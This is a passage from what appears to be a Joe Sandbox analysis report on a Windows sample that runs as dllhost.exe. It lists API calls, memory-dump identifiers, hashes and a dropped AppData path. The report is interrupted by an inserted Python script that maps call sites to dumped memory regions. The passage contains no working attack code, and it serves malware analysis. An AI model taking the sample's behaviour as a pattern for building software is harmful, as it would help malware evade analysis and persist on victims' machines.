                                                                              Similarity
                                                                              • API ID: CreateInstance
                                                                              • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea
                                                                              • API String ID: 542301482-1965738620
                                                                              • Opcode ID: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                                                              • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                                                              • Opcode Fuzzy Hash: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                                                              • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                              APIs
                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                              • RegCloseKey.KERNEL32(?), ref: 00402551
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3356406503-0
                                                                              • Opcode ID: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                                                              • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                                                              • Opcode Fuzzy Hash: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                                                              • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                                                              APIs
                                                                              • MulDiv.KERNEL32 ref: 004013E4
                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                              • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                                              • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                              • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                              APIs
                                                                              • RegDeleteValueW.ADVAPI32 ref: 004023AA
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteValue
                                                                              • String ID:
                                                                              • API String ID: 2831762973-0
                                                                              • Opcode ID: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                                                              • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
                                                                              • Opcode Fuzzy Hash: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                                                              • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 00405393
                                                                                • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004053DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeMessageSendUninitialize
                                                                              • String ID:
                                                                              • API String ID: 2896919175-0
                                                                              • Opcode ID: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                                                              • Instruction ID: 26d04017d7367bbfa1c35918477487f98c57589759ea251963dc576d4d611ade
                                                                              • Opcode Fuzzy Hash: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                                                              • Instruction Fuzzy Hash: 98F09072610A00DBE2115754AD01B167764EB80395F15447EFE84A23E196BA48128B7E
                                                                              APIs
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableShow
                                                                              • String ID:
                                                                              • API String ID: 1136574915-0
                                                                              • Opcode ID: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                                                              • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
                                                                              • Opcode Fuzzy Hash: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                                                              • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
                                                                              APIs
Memory Dump Source / Snapshot File: same as the first entry above (hcaresult_23_2_400000_dllhost.jbxd)
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                                                              • Instruction ID: f017f9f214282da9378315d684086af48e7312a2d574c5b78b61c32a83121298
                                                                              • Opcode Fuzzy Hash: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                                                              • Instruction Fuzzy Hash: 45E086367001059FCB25DBA4ED848BE77A6EB48310758057FE902F36A1CA759D51CF68
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                                • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD
                                                                                • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                                                                                • Part of subcall function 004065B6: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
Memory Dump Source / Snapshot File: same as the first entry above (hcaresult_23_2_400000_dllhost.jbxd)
                                                                              Similarity
                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2547128583-0
                                                                              • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                              • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
                                                                              • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                              • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
Memory Dump Source / Snapshot File: same as the first entry above (hcaresult_23_2_400000_dllhost.jbxd)
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate
                                                                              • String ID:
                                                                              • API String ID: 415043291-0
                                                                              • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                              • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                              • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                              • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
Memory Dump Source / Snapshot File: same as the first entry above (hcaresult_23_2_400000_dllhost.jbxd)
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1375471231-0
                                                                              • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                              • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
                                                                              • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                              • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
                                                                              APIs
Memory Dump Source / Snapshot File: same as the first entry above (hcaresult_23_2_400000_dllhost.jbxd)
                                                                              Similarity
                                                                              • API ID: FileMove
                                                                              • String ID:
                                                                              • API String ID: 3562171763-0
                                                                              • Opcode ID: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                                                              • Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
                                                                              • Opcode Fuzzy Hash: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                                                              • Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F
                                                                              APIs
                                                                              • WritePrivateProfileStringW.KERNEL32 ref: 0040233D
Memory Dump Source / Snapshot File: same as the first entry above (hcaresult_23_2_400000_dllhost.jbxd)
                                                                              Similarity
                                                                              • API ID: PrivateProfileStringWrite
                                                                              • String ID:
                                                                              • API String ID: 390214022-0
                                                                              • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                              • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                              • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                              • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                              APIs
                                                                              • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00406110
Memory Dump Source / Snapshot File: same as the first entry above (hcaresult_23_2_400000_dllhost.jbxd)
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                              • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                              • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405DD5
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                              • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                              • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
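Every function entry in this part of the report points at the same set of .sdmp memory dumps taken from process 0x17 (the hollowed dllhost.exe, snapshot hcaresult_23_2_400000_dllhost.jbxd), and each API call is located by a "ref:" address inside that image. When triaging a report like this, the first question is which dump actually holds code and whether the call sites fall inside it. The Python below is an added example written for this page, not code from the report or from Joe Sandbox. It treats the dotted identifier as process index, iteration, dump id, base address, page protection, state, memory type and module id; that field layout is an assumption inferred from the values on the page, while the PAGE_* and MEM_* constants are the standard winnt.h values. Region sizes are not in the names, so each region is assumed to run up to the next dumped base. The identifiers and call-site addresses used as input are copied from the entries on this page.

```python
"""Classify Joe Sandbox .sdmp dump identifiers and map API call sites
(the "ref:" addresses) to the dumped region that contains them."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Standard Windows memory constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED field layout, inferred from the identifiers in this report:
# proc.iteration.dumpid.base.protection.state.type.module.sdmp
_SDMP = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<iter>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class Region:
    process: int
    base: int
    protect: int
    mem_type: int
    module: int

    @property
    def protect_name(self) -> str:
        # Mask off PAGE_GUARD / PAGE_NOCACHE modifier bits before the lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def executable(self) -> bool:
        # All PAGE_EXECUTE* values live in the 0xF0 nibble.
        return bool(self.protect & 0xF0)


def parse_sdmp(name: str) -> Region:
    m = _SDMP.match(name.strip())
    if not m:
        raise ValueError(f"not an sdmp identifier: {name!r}")
    return Region(process=int(m["proc"], 16), base=int(m["base"], 16),
                  protect=int(m["prot"], 16), mem_type=int(m["type"], 16),
                  module=int(m["module"], 16))


def region_for(regions: List[Region], addr: int) -> Optional[Region]:
    """Region with the highest base not above addr (assumes each dump
    extends to the next dumped base; the names carry no size)."""
    below = [r for r in regions if r.base <= addr]
    return max(below, key=lambda r: r.base) if below else None


def executable_regions(names: List[str]) -> List[Region]:
    return [r for r in map(parse_sdmp, names) if r.executable]


def resolve_call_sites(names: List[str], sites: Dict[str, int]) -> Dict[str, Optional[Region]]:
    regions = [parse_sdmp(n) for n in names]
    return {api: region_for(regions, addr) for api, addr in sites.items()}


# Input copied from the Memory Dump Source / Associated lists on this page.
DUMPS = [
    "00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp",
    "00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp",
    "00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp",
    "00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp",
    "00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp",
    "00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp",
    "00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp",
    "00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp",
]
# Call-site addresses ("ref:") from the API entries on this page.
CALL_SITES = {
    "ReadFile": 0x405DD5, "GetPrivateProfileStringW": 0x402379,
    "SetFileAttributesW": 0x4015AE, "SendMessageW": 0x40423F,
    "SetFilePointer": 0x403303, "KiUserCallbackDispatcher": 0x40420D,
}

if __name__ == "__main__":
    for r in map(parse_sdmp, DUMPS):
        print(f"{r.base:#010x} {r.protect_name:<22} {MEM_TYPE.get(r.mem_type, '?')}")
    for api, r in resolve_call_sites(DUMPS, CALL_SITES).items():
        print(f"{api:<26} -> {r.base:#x} ({r.protect_name})")
```

Run as-is it shows that only the 0x401000 dump is PAGE_EXECUTE_READ (the MEM_IMAGE code section of the reconstructed PE at 0x400000) and that every call site on this page resolves into it, so that is the dump to load into IDA; the 0x02 and 0x04 regions are the header, .rdata and writable data.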
                                                                              APIs
                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileString
                                                                              • String ID:
                                                                              • API String ID: 1096422788-0
                                                                              • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                              • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                                              • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                                              • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
